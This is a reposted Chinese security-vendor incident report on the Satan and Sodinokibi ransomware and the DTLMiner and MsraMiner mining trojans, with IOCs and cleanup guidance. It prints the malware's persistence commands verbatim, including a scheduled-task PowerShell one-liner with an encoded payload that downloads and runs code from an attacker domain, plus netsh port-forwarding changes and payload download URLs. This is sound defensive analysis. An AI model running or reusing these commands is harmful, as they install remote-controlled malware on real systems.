您的位置:首页>>电脑软件

挖矿勒索两开花:安全狗提醒用户注意防范勒索病毒

发布时间:2019-05-28 11:54:54  来源:互联网    背景:

  防护千万条,安全第一条;补丁没打全,中毒两行泪。

  近日,安全狗海青实验室接到多起客户中毒求助,经安全研究人员分析,这些病毒感染的途径90%以上都是“永恒之蓝”漏洞和弱口令爆破。

  自2017年NSA”武器库”被黑客组织”影子经纪人”泄露以及WannyCry勒索病毒的爆发,“永恒之蓝”就是一个经久不息的话题,直到2019年的今天,还有大量主机因为“永恒之蓝”漏洞感染病毒。

  2019年4-5月,我们所接触以及处理的病毒大多利用永恒之蓝漏洞进行传播,而在没有打过补丁的机器中,往往有多种病毒同时存在,”历史包袱”严重。不仅如此,近期的挖矿木马和勒索病毒为了对抗杀毒软件,更是频繁迭代新版本,为了抢占受害者的”算力市场”,黑客怕是早已进入了”996”。

  总的来说,以安全卫道,任重而道远。

  根据近期应急支撑工作总结的情况,我们把遇到的问题主要分为两大类来讨论:勒索病毒和挖矿木马。

  勒索病毒

  此次发现的勒索病毒除了利用经典的永恒之蓝漏洞和弱口令爆破感染外,还利用多个中间件NDay对互联网主机进行攻击。我们在发现病毒后第一时间发出勒索病毒预警:【安全预警】警惕!Satan勒索病毒新变种卷土重来、【高危安全预警】Sodinokibi勒索软件感染Windows服务器预警

  Satan勒索病毒

  2019年4月中旬,海青实验室接到客户求助,并截获到Satan勒索病毒最新变种。该变种病毒会针对Windows系统和Linux系统进行无差别攻击。

  Satan病毒在Windows电脑/服务器中,利用永恒之蓝漏洞对局域网Windows电脑进行攻击,同时攻击模块利用JBoss、Tomcat、Weblogic、Apache Struts2多个组件漏洞以及Tomcat弱口令爆破对Windows、Liunx服务器进行攻击。病毒攻击模块在对目标主机攻击成功后,将针对目标操作系统到C2下载勒索病毒主体,并对文件进行加密。目前已有多家企业中招。

  病毒攻击模块对主机攻击成功后,判断目标主机操作系统类型,其次到服务器(111.90.159.106)下载相应病毒主体。Windows系统将病毒文件放在C:\\fast.exe,linux系统病毒主体在/tmp/r.sh。下载成功后执行病毒文件。

  病毒执行后将对本地文件加密,并对局域网主机进行横向感染。勒索信采用中文编写,看来黑客主要勒索目标是中国用户。勒索信信息如下图:

  日志溯源:

  查看jboss日志,发现从2019-04-xx 02:55:51开始一直有恶意利用jboss漏洞的exp在对中毒机器进行攻击:

  初步分析,最后利用成功的应该是一个jboss反序列化漏洞:

  攻击成功后,上传jsp文件satan.jsp。该文件如上文:根据系统从c2下载勒索软件本体并执行

  防范措施:

  对于勒索病毒,我们只能尽量防范。因为一旦中招,除了支付赎金,能解密的几率非常小,因此防范和中毒后的处理是重点。

  1、及时升级操作系统安全补丁,升级Web、数据库等服务程序,防止病毒利用漏洞传播。

  2、JBoss、Tomcat、Weblogic、Apache Struts2等服务器组件即时安装安全补丁,更新到最新版本。

  3、服务器、Tomcat等登录避免使用弱密码,建议使用“大写字母+小写字母+数字+符号”8位以上密码。

  4、定期做好重要数据备份。

  IOCs:

  111.90.159.106

  http://111.90.159.106/r.sh

  http://111.90.159.106/f.exe

  fe014fbf44e2b42d70e3effa2248348a

  Sodinokibi勒索病毒

  该病毒家族最早出现于2019年4月下旬,其传播和利用手法丰富,短期内版本更新迭代快。目前应急的客户中,嘉兴、泸州都有中此病毒的案例。

  传播途径

  1).该病毒利用3389弱口令爆破

  2). 4月底刚披露的Weblogic远程代码执行漏洞CVE-2019-2725并配合其他nday漏洞对Windows服务器发起攻击

  3). cve-2018-8453 Windows内核提权漏洞提升自身权限

  4).垃圾邮件传播

  Sodinokibi勒索软件感染服务器成功后会生成文件加密后缀名+readme.txt的勒索信息,勒索信息包括个人的ID序列号,以及恶意软件作者的联系方式。有趣的是最初的曝光者Cisco Talos团队披露的攻击者勒索信息开头显示的是“Hello Dear friend”,而此处使用的是“Welcome Again”,不排除攻击者实施攻击的过程中有二次投递勒索软件的行为。

  防范措施:

  1.Weblogic、Apache Struts2等服务器组件及时安装安全补丁,更新到最新版本。

  2.远程桌面避免使用弱密码,建议使用“大写字母+小写字母+数字+符号”8位以上密码。

  对重要的数据文件定期进行非本地备份。

  IOCs:

  MD5:e62c896825a6d186f34fb16b1f57490a

  Domain:

  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion

  http://decryptor.top

  挖矿木马

  死灰复燃的DTLMiner家族挖矿木马

  该家族病毒自”驱动人生”事件后开始活跃。从入侵“驱动人生”植入挖矿病毒升级插件到对自身病毒更新频率、持久化机制的改变、对抗杀软的手法来看,我们认为该团伙是一个“渗透经验丰富”同时具备较强的反侦察能力的职业黑产团伙。

  我们来回顾该团伙搞的“大新闻”。

  2018年12月14日,“驱动人生”的升级模块被不法分子利用传播挖矿木马病毒“DTLMiner”,短期内感染数万台计算机。

  驱动人生升级推送程序会通过网址链接

  Http://pull.update.ackng.com/calendar/PullExecute/F79CB9D2893B254CC75DFB7F3E454A69.exe

  将病毒下载到本地执行。

  该病毒运行后,将自身释放到System32(或SysWOW64)目录下(C:\Windows\SysWOW64\svhost.exe),将该可执行文件注册为系统服务继续执行恶意代码,注册服务名为Ddriver。

  svhost.exe为永恒之蓝漏洞攻击组件,执行之后会对内网具有永恒之蓝漏洞和弱口令的主机进行横向传播,并从http://dl.haqo.net 下载攻击组件执行。(下载的文件即为该svhost.exe)。此外,该svhost进程还将搜集主机信息,发送到服务器:http://i.haqo.net/i.png。

  除了攻击、感染、信息搜集外,此时该病毒还未触发其他恶意行为,初步推测该病毒属于测试阶段。

  下面将盘点该DTLMiner家族各版本中对抗杀软的手法变化,并给予对应的清除方案。

  1.1 版本1-文件增肥

  病毒采取落地PE文件形式,文件名是随机的,木马在生成过程中会在文件末尾填充垃圾数据,生成50M左右的大文件来逃避特征查杀。

  该木马启动后会在多个系统目录下释放增肥的木马文件,以随机的方式生成的文件名。

  C:\windows;

  C:\Users\admin\AppData\Roaming;

  C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup;

  通过schtasks 创建任务计划:

  schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN <随机名> /tr “cmd.exe /c C:\Windows\<随机名>.exe”

  通过注册表启动项添加开机自启,并把C:/Users/admin/AppData/Roaming目录下的增肥木马当作启动程序:

  HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

  清除方案

  删除病毒文件:

  C:\Windows\Temp\sartpg.exe

  %appdata%\Microsoft\cred.ps1

  C:/Windows/随机名.exe

  C:/Users/admin/AppData/Roaming/随机名.exe

  C:/Users/admin/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/随机名.exe

  删除以下计划任务:

  随机名

  cmd.exe /c C:\Windows\随机名.exe

  删除菜单启动项下的病毒文件:

  C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\随机名.exe

  删除注册表中的恶意启动项以及操作文件:

  HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

  C:/Users/admin/AppData/Roaming/随机名.exe

  1.2 版本2-服务持久化

  该版本采用服务进行自身持久化,在漏洞利用成功后,创建随机名称的服务

  类似客户这台机器,被多次感染后创建了多个随机的病毒服务

  服务的可执行文件路径:

  C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  利用服务对自身进行持久化

  清除方案

  禁用该服务,遍历任务计划(不仅仅在\Microsoft\windows\Rass有任务计划),清除powershell任务计划

  1.3版本3-利用JS脚本执行

  在攻击成功后,病毒在系统启动项释放flashplayer快捷方式,并在

  %appdata%释放flashplayer.tmp文件,该文件内容

  此文件是一个脚本,使用JS 调用PowerShell脚本下载。下载的模块解密后

  分别:设置任务计划,启动持久化机制,根据系统版本下载powershell挖矿脚本,下载攻击脚本进行横向传播

  清除方案:

  %appdata%中的flashplayer.tmp文件

  清除启动项中的快捷方式

  遍历任务计划,和版本2的方案一样,删除powershell任务计划

  1.4 版本4-无文件落地伊始

  该版本采用无文件落地形式在系统进行驻留,病毒感染成功后直接创建如下任务计划

  schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  同样的,这些任务计划从黑客服务器中下载代码,并直接执行,传统的静态杀毒引擎并不能查杀它。

  清除方案:

  遍历任务计划,清除powershell任务即可

  1.5 版本5-任务计划隐藏

  在版本4的基础上,利用某些windows版本对任务计划xml文件解析错误的bug,用特殊字符命名任务计划。导致在图形界面中显示不了该任务计划。

  清除方案

  要清除这些任务计划,到系统路径C:\Windows\System32\Tasks或C:\Windows\Tasks中,遍历这些xml文件,找到powershell任务相关的xml,删除。

  1.6 版本6-未知持久化

  个别机子新的变种中,有不明进程启动powershell,通过查看该powershell参数,确认这个是病毒启动的。但是这个powershell启动后,执行自退出,并没有进一步感染、挖矿、占用CPU。检查了一些持久化机制(计划任务、服务、启动项等没发现问题)但是定位不到启动方式。

  虽然该powershell启动后自杀,并没有执行到恶意代码部分,但是不能保证后期不会再次爆发。

  这个powershell 的父进程是 C:\Windows\svchost.exe,但是svchost.exe是系统的服务进程,系统服务依托了任务计划 wmi 等多个系统服务,检查了该PID下依托的服务 都是正常的

  用了360处理,发现360没有对这个进行查杀,但是实时监控powershell启动的参数,对类似如下参数启动的powershell进程进行阻断:

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=

  可行措施:

  通过进程监控,获取powershell参数,判断是否为病毒阻止其执行。

  1.7整体查杀方案:

  对于有二进制文件落地的版本,用云眼查杀;

  对于没有文件落地的版本:

  遍历服务,禁用服务名为随机字母组成、服务文件路径特征为

  C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

  的服务

  遍历任务计划,清除powershell特征的任务

  特征如:

  启动次数频繁(30-60分钟执行一次)

  Powershell 参数如:-ep bypass -e + base64 编码数据、-hidden 隐藏窗口

  用windows自带的任务计划图形界面程序有时候无法获取完全的任务计划(如2.3.5),建议使用代码遍历任务计划文件夹C:\Windows\System32\Tasks或C:\Windows\Tasks,通过删除这些xml文件来清除任务计划。

  清除注册表

  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

  删除以随机名称命名、数值数据为:

  C:\Windows\System32\config\systemprofile\AppData\Roaming\ + 随机名称

  的注册表键

  对于未知启动的恶意powershell,通过进程监控,阻断带有恶意参数的powershell进程(恶意参数参考2)

  IOCs

  IP:

  27.102.107.137

  域名:

  p.beahh.com、v.beahh.com、v.y6h.net、down.bddp.net、p.bddp.net、v.bddp.net、p.zer2.com、p.awcna.com、p.amxny.com

  2. MsraMiner挖矿家族

  该挖矿木马家族在今年4-5月份也算是比较活跃的,在应急过程中,DZJ、JX、NJ、LZ项目中都有发现中此家族病毒的机器。

  该变种利用“永恒之蓝”漏洞传播,在传播成功后,母体运行后释放服务模块,释放的服务模块名称随机拼凑。例如:ApplicationNetBIOSEvent.dll

  病毒从以下字符串拼凑:

  创建服务:ApplicationNetBIOSEvent(不同的机器不同服务名),下放服务配置文件C:\windows\system32\ApplicationNetBIOSEvent.dll

  释放“永恒之蓝”攻击工具包到C:\Windows\NetworkDistribution或C:\Windows\SpeechsTracing目录,攻击内网中的其它机器。

  清除方案:

  该病毒基于windows服务进行自身持久化,因此首先应禁用服务:

  找到服务,服务为随机拼凑名,但也是有迹可循的:

  服务描述为

  Enables a common interface and object model for the $SERVER_NAME$ to access management information about system update, network protocols, devices and applications. If this service is stopped, most Kernel-based software will not function properly. If this service is disabled, any services that depend on it will fail to start.

  或

  服务名wmassrv(这是比较老的版本,服务名不随机)

  首先找到该服务,在任务管理器点击右键,转到进程。记下进程的PID。禁用该服务,停止该服务,结束该进程(刚刚我们记下的进程),结束svchost.exe *32 。删除或隔离C:\Windows\NetworkDistribution 下所有文件。隔离C:\windows\system32\ApplicationNetBIOSEvent.dll

  IOCs:

  MD5:

  befb60b1240d360ca74c25d3637e165e

  95786b6c28bf8dba7bbfeeba9e1ec27a

  总结

  大部分主机由于没及时打上补丁和弱口令问题导致机器中毒,进而导致内网横向传播,造成大批量感染情况。鉴于勒索病毒、挖矿病毒不断更新攻击方法和持久化机制以对抗杀毒软件,以下提出几点有效的防范措施:

  定期对自身管理的服务器进行安全体检,并及时更新漏洞补丁和病毒库。关注安全厂商发布的漏洞预警和病毒预警,对自身资产进行自查。除业务需要服务外,限制其余不必要服务及端口。

  使用安全性高的密码。很多计算机管理人员并没有意识到自己使用的是弱口令,如密码带有设备、个人、单位、部门信息;常用英文单词(如Password、key、Huawei、admin)等关键词变型;键盘规律字符(如qaz、qwe、!@#、147)等等都是弱口令。建议使用大小写字母+数字+符号八位以上的字符串(最好是无规则)用作密码。且强烈不建议多台机器或数据库使用同一密码,应做到一机一码。

  建立灾备方案。要知道信息安全中,绝对安全是不存在的,对于重要资产应当建立一套完整的灾备方案。例如定时做好数据备份,建立备用服务器,做好主备机器切换策略,定期进行灾备演练。

  限制服务器上的Powershell。黑客经常利用powershell来完成其渗透攻击,而大部分服务器上承载的业务其实用不到powershell。因此,若业务上用不到powershell组件,建议将其关闭或禁用。

特别提醒:本网内容转载自其他媒体,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。


返回网站首页 本文来源:互联网

本文评论
《沉睡魔咒2》与朱莉再续前缘,腾讯手机管家提醒勿下山寨病毒软件
当魔法力量与人类欲望相互碰撞,受人尊重的女王化身毁灭使者,邪恶女巫成为守护一方和平的卫士。迪士...
日期:10-18
Windows 10 Build 19002发布:蓝牙配对优化向快速通道成员开放
10月18日消息 微软今天面向Windows Insider快速通道的用户发布了20H1的最新预览版系统更新,内部版...
日期:10-18
Ubuntu 20.04 LTS代号“Focal Fossa”,明年4月正式发布
Ubuntu 19.10“Eoan Ermine”刚刚发布,20.04版本也已开始亮相。仍然遵循英文字母顺序的...
日期:10-18
金山文档上线“跨表引用”,在线文档分水岭渐显
作为一款专业在线协作文档工具,金山WPS旗下的金山文档日前上线了“跨表格引用数据”功能...
日期:10-17
这两个实用的WPS功能,让PPT制作更轻松
不管是学校里的学生,还是职场的上班族,大部分会选择WPS作为处理办公文档的软件。为了能满足大家日...
日期:10-17
预警!永恒之蓝下载器木马新增BlueKeep漏洞检测代码,未修复比例高达近30%
近日,腾讯安全御见威胁情报中心监测发现,“永恒之蓝下载器”木马再次更新,新增了BlueK...
日期:10-17
微软Windows 10计算器更新:全面支持三角学、 函数(f)
10月16日消息 Windows 10系统内置了一款计算器,也可以从应用商店下载,并且具有一些专用于更高级工...
日期:10-16
谷歌Chrome浏览器测试新功能:解决爱吃内存问题
10月15日消息 谷歌Chrome浏览器是Windows上占用资源最多的应用程序之一,如果安装扩展程序或打开过...
日期:10-15
Safari浏览器欺诈网站警告功能引发用户隐私担忧
有用户发现,在苹果的Safari的隐私条款中有一个特别的条款。叫做 Fraudulent Webstie Warning ,欺...
日期:10-14
Mac终于和iTunes说再见了 那Windows用户呢?
macOS Catalina 的发布可能会减少 Mac iTunes 用户对苹果著名的臃肿的媒体管理和播放应用程序的抱怨...
日期:10-14
微软Windows 10更新助手存漏洞:黑客可执行系统级权限代码
10月12日消息 据外媒报道,Microsoft Windows 10 Update Assistant(微软Win 10更新助手)中的一个安...
日期:10-12
《中国机长》等国庆档大片叫座,手机观影当心中招木马病毒
“我和我的祖国,一刻也不能分割,无论我走到哪里,都流出一首赞歌……”王菲翻...
日期:10-12
PS和LR在苹果macOS Catalina上出现“兼容性问题”
macOS Catalina正式版已经推出多日,但如果你是PhotoShop和Lightroom的重度用户的话,建议你暂时不...
日期:10-09
删除的微信聊天记录怎么恢复?专业软件让恢复变得轻而易举
如果未来的某一天,我很不不幸的遭遇了车祸或者是其他意外,那我一定一定是不愿意死的,因为&hellip...
日期:10-08
苹果手机微信聊天记录怎么彻底删除?左滑删除只是掩耳盗铃!
苹果手机微信聊天记录怎么彻底删除?这个月苹果官网又推出新款手机苹果iPhone11Pro,很多土豪小伙伴...
日期:09-30
淘集集可以提现吗?如何提现?
随着越来越多人用淘集集app进行购物,也听说了淘集集购物返红包,甚至可以直接体现,这是真的吗?要怎么...
日期:09-29
如何用智能电视观看网盘内容?当贝市场一招搞定
智能电视上的视频内容很多时候无法满足我们用户需求,这时应该怎么办?当贝小编今天就给大家解答一下...
日期:09-29
Windows 10补丁KB4517210发布,升级1903版本更顺畅了
9月29日消息 Windows 10版本1903(2019年5月更新)正式准备进行大规模部署推送,并且微软现在正在推出...
日期:09-29
Mozilla的Firefox Nightly不再对TLS 1.0和TLS 1.1提供支持
Mozilla在最新的Firefox Nightly版本中已不再对TLS 1.0和TLS 1.1加密协议提供支持。此举是继苹果、...
日期:09-29
腾讯安全:IE浏览器曝远程执行代码漏洞 腾讯安全强势推出漏洞修复工具
近日,微软发布一例远程执行代码漏洞(CVE-2019-1367)漏洞修复补丁,攻击者可利用网页挂马和邮件进行...
日期:09-27
  专栏介绍
王涵 的专栏
王涵发表的文章
积分:
自我介绍 :